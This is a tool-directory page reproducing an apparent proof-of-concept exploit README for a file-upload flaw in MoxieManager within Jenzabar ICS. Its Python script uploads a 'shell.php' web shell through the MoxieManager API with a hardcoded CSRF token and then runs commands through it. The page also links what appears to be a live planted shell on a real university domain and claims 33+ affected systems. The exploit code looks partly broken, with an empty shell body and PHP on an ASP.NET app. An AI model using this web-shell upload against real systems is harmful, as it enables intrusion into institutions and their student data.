Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (Crítico) Possível RCE Jenzabar ICS + MoxieManager | Kitploit
Tools/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (Crítico) Possível RCE Jenzabar ICS + MoxieManager

View Repository
14 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (Critical) Possible RCE Jenzabar ICS + MoxieManager

proof https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS Impact Affected CVE-2026-30-03 9.8 (Critical) Possible RCE Jenzabar ICS + MoxieManager

A vulnerability in the MoxieManager component used by the Jenzabar ICS system may allow improper file uploads, which, under certain conditions, can be publicly accessed and potentially lead to remote code execution (RCE). Technical Description

The issue occurs due to:

Lack of proper validation of uploaded files

Possible exposure of files via public endpoint:

/ICS/staticpages/getfile.aspx

Inconsistent authentication control on the endpoint:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

In specific scenarios, uploaded files may be stored in accessible directories and later retrieved.

Impact Arbitrary file upload Exposure of sensitive content Possible remote code execution (depending on server configuration) Full system compromise

Classification CVSS v3.1: 9.8 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: Unrestricted upload of file CWE-284: Improper access control

PoC Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

Affected Systems (33+ Confirmed)

Remediation Immediate (Mitigation):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. Restrict getfile.aspx:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. Disable MoxieManager uploads

Proof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

Download Tool